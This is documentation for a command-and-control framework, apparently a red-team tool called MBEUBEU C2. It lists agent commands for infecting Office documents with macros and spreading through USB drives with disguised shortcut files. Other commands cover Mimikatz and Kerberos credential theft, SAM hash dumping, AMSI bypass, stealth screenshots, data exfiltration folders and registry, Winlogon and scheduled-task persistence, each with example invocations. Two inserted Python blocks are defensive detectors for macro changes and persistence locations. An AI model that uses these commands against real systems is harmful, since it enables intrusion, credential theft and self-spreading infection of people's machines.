Interactive Bayefall Commands

Before going further, note that all screenshots taken will be saved in ./files/Downloads/screenshots/.
All smart-shots will be saved in ./files/Downloads/screenshots/window_title_name.pgn, and all downloaded data will be stored in ./files/Downloads/exfiltrated_data/.
Additionally, all Bayefall logs are stored in ./files/Downloads/logs/.

You can use the report.py script located in files/tools/ to generate a report in HTML format, which can be opened in your browser. The report.py script must be run from the project directory (cd mbeubeu-c2). Example usage:

python3 files/tools/report.py 

The report_start and report_stop commands are used to serve the index.html report page, which allows login with a randomly generated username and password. The URL will be based on the TeamServer's IP address and port.

report_start
Interactive mode


When a new Bayefall is registered, you can use the interact command to interact with the Bayefall.

The Bayefall name looks like SRV01@2025-05-14-22-35-30, which is the target hostname and the first seen timestamp separated by @. Keep in mind that if the Bayefall has non-privileged access, the interactive console color will be blue. If it has privileged access, the console color will be red.

interact 'bayefall_name'

Hidden Features

There are several commands included to make internal phishing, recon and persistence easier.

office_infect

Command to weaponize Office documents. It looks for .docm or .xlsm files in every user's Desktop and Documents directories and infects them.


The .bin file can be extracted using the unzip command: unzip -d extracted_macro file.docm. Then, navigate to the word or xl directory to find the .bin file. You only need this file for the office_infect command.

office_infect /home/p4p4/vbaProject.bin
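
On the defensive side, the same package layout (vbaProject.bin under word/ or xl/) lets you baseline the macro part of every .docm/.xlsm in Desktop and Documents and flag files whose macro part appeared or changed. The following is an added example, not part of MBEUBEU C2; the function names, paths and sample documents are constructed for illustration.

```python
import hashlib
import io
import zipfile

# OOXML part names that hold the VBA project in Word and Excel packages.
MACRO_PARTS = {"word/vbaproject.bin", "xl/vbaproject.bin"}

def macro_digest(data):
    """SHA-256 of the embedded vbaProject.bin, or None if absent or not a zip."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if name.lower() in MACRO_PARTS:
                    return hashlib.sha256(zf.read(name)).hexdigest()
    except zipfile.BadZipFile:
        return None
    return None

def compare(baseline, current):
    """baseline: {path: digest or None}; current: {path: bytes} -> findings."""
    findings = []
    for path, data in current.items():
        now = macro_digest(data)
        if now is None:
            continue
        if path not in baseline:
            findings.append((path, "new macro-enabled file"))
        elif baseline[path] is None:
            findings.append((path, "macro part added"))
        elif baseline[path] != now:
            findings.append((path, "macro part changed"))
    return sorted(findings)

def make_doc(vba=None, folder="word"):
    """Constructed sample: a minimal zip shaped like a .docm/.xlsm package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        if vba is not None:
            zf.writestr(f"{folder}/vbaProject.bin", vba)
    return buf.getvalue()

# Constructed data: digests recorded earlier, then the same folders re-read.
BASELINE = {"Desktop/budget.xlsm": macro_digest(make_doc(b"v1", "xl")),
            "Documents/notes.docm": macro_digest(make_doc(b"v1"))}
CURRENT = {"Desktop/budget.xlsm": make_doc(b"v1", "xl"),
           "Documents/notes.docm": make_doc(b"v2"),
           "Documents/offer.docm": make_doc(b"v1")}
```

Calling compare(BASELINE, CURRENT) reports notes.docm as changed and offer.docm as new, while the untouched budget.xlsm produces no finding.
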
smart_shot

Stealth Screenshots: Command to take screenshots based on window titles. I’ve provided a titles.txt file so you can choose the window titles you want.

smart_shot file_content_titles time_in_second 
smart_shot titles.txt 5000
usb_infect

USB Propagation: This command monitors plugged-in USB devices and automatically infects them.
You only need to provide a payload.exe file and a document file. It will then create hidden files along with a .lnk file that uses the same icon as Microsoft Word.

usb_infect Ndobin.exe invoice.docx NoSuspectName 60
pwsploit

PowerSploit Integration: Currently, only the Mimikatz and Recon modules are available. The Recon module uses all PowerView commands, while the Mimikatz module supports all Invoke-Mimikatz commands.

pwsploit recon Get-Domain
pwsploit mimikatz "privilege::debug"

bof_execute

Beacon Object Files: The bof_execute command lets you choose an available BOF command (use tab completion to display available commands) or provide your own BOF file as args[1].

[💀 bayefall (DC01 | 2025-09-29-10-33-08) ] > bof_execute -h

BOF Situational Awareness :
================================
enum_whoami                     Enumerate current user privileges
enum_localusers                 Enumerate local user accounts
enum_domaingroups               Enumerate domain groups
enum_localgroups                Enumerate local groups
enum_domainusers                Enumerate domain user accounts
enum_domaingroupmembers         Enumerate domain group memberships
enum_arpscan                    Enumerate local network using ARP scan
enum_services                   Enumerate running and stopped services
enum_firewallrules              List configured Windows Firewall rules
enum_routeprint                 Display network routes
enum_sessioninfo                Get session and login info
enum_localsessions              Enumerate local user sessions
enum_schtasks                   List scheduled tasks
enum_notpad                     Show notepad contents
enum_listdns                    List DNS
enum_azure_ad_joininfo          Enum Azure AD Info
enum_env                        Show environdment varibales
enum_resources                  Show Resources
enum_ipconfig                   Show IP configuration
enum_netstat                    Display network connections
enum_adcs                       Enumerate AD CS Certificate Templates and configuration

BOF Local Privilege Escalation :
====================================
priv_unquoted                   Find unquoted service paths for privilege escalation
priv_modifiableautorun          Detect user-modifiable autoruns
priv_tokenprivileges            Display token privileges
priv_alwaysinstallelevated      Check AlwaysInstallElevated settings

BOF Kerberos Abuse :
======================
rubeus_asktgt                   Request a TGT for a user/password
rubeus_asktgs                   Request TGS ticket from TGT
rubeus_asreproasting            Enumerate users vulnerable to AS-REP roasting
rubeus_cross_s4u                Perform cross-domain S4U2self + S4U2proxy
rubeus_dump                     Dump Kerberos tickets from memory
rubeus_kerberoasting            Request TGS tickets for Kerberoasting
rubeus_ptt                      Pass-the-Ticket: Inject Kerberos tickets
rubeus_renew                    Renew TGT using Rubeus
rubeus_tgtdeleg                 Extract TGT from TGT delegation context
rubeus_changepw                 Change user password via Kerberos
rubeus_describe                 Describe ticket content
rubeus_hash                     Calculate Kerberos-compatible password hashes
rubeus_klist                    List Kerberos tickets
rubeus_purge                    Delete all Kerberos tickets)
rubeus_s4u                      S4U constrained delegation
rubeus_triage                   Summarize Kerberos tickets and session info

BOF Credentials  :
======================
askcreds                        Prompt for Credentials
autologon                      Registry autologon information
credman                        Windows Credential Manager saved web passwords
hashdump                      Dump SAM Hashes

	
bof_execute /local/bof/file.o
pwsh-import

PowerShell Integration: This feature allows you to import PowerShell scripts and use the pwsh-execute command to run functions from them. All imported scripts still bypass AMSI. Please refer to the OPSEC page for details on how the bypass is implemented.

pwsh-import Invoke-Mimikatz.ps1
pwsh-execute Invoke-Mimikatz -Command "privilege::debug"

Note: Only one script can be imported at a time.

persist_*

The persistence module allows you to establish persistence using various techniques such as startup folder, Winlogon, registry run keys, and scheduled tasks.


persist_startup user/system
persist_winlogon user/system
persist_resgistryrun user/system
persist_schtask user/system

Note that persist commands will not work if you are using the PowerShell one-liner, because it injects a process, while the persist commands rely on os.Executable().
Tip: a one_liner should not be run on a victim machine. It is intended for use in "assumed breach" scenarios where you have full physical control over the machine. If you use the one_liner on an uncontrolled machine, your C2 IP address may be exposed and subsequently banned, so take precautions.
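
For blue teams, the four techniques named above map to well-known Windows locations that endpoint telemetry already records. The following added example (not MBEUBEU C2 code) matches constructed events against those locations and labels each hit with the same user/system distinction the persist_* commands take; the event kinds and the sample events are hypothetical.

```python
import re

# Well-known Windows locations for the four techniques named above.
# Event kinds are hypothetical normalised names for Sysmon events
# 13 (registry value set), 11 (file create) and 1 (process create).
RULES = [
    ("registry run key", "registry_set", re.compile(
        r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)),
    ("winlogon", "registry_set", re.compile(
        r"\\Windows NT\\CurrentVersion\\Winlogon\\(Userinit|Shell)$", re.I)),
    ("startup folder", "file_create", re.compile(
        r"\\Start Menu\\Programs\\Startup\\[^\\]+$", re.I)),
    ("scheduled task", "process_create", re.compile(
        r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
]

def scope(target):
    """Map a hit to the user/system distinction used by persist_*."""
    t = target.lower()
    if t.startswith(("hklm\\", "c:\\programdata\\")) or "/ru system" in t:
        return "system"
    return "user"

def detect(events):
    """Return (technique, scope, target) for every event matching a rule."""
    hits = []
    for kind, target in events:
        for technique, rule_kind, pattern in RULES:
            if kind == rule_kind and pattern.search(target):
                hits.append((technique, scope(target), target))
    return hits

# Constructed events: (kind, registry path / file path / command line).
EVENTS = [
    ("registry_set", r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Upd"),
    ("registry_set", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"),
    ("file_create", r"C:\Users\amy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"),
    ("process_create", r"schtasks.exe /create /tn Upd /tr C:\Temp\upd.exe /sc onlogon /ru SYSTEM"),
    ("registry_set", r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"),
    ("file_create", r"C:\Users\amy\Documents\report.docx"),
    ("process_create", r"schtasks.exe /query /fo LIST"),
]

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

Tasks registered through the Task Scheduler API never spawn schtasks.exe, so pair the command-line rule with Security event 4698 (a scheduled task was created).
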

defence-analysis

The defence-analysis command allows you to analyze the target's defensive posture and receive a security hardness score. This technique was inspired by Ahmed Khlief's Ninja-C2.

defence-analysis

Task/Ndigeul Commands

Use the help command to show the available Bayefall commands.

[💀 bayefall (SRV01 | 2025-05-14-22-35-30) ] > help

Note: All SharpView commands are also available, but they are not OPSEC-safe.

For OPSEC considerations when using these features, see: OPSEC | Avs Evasion Guidelines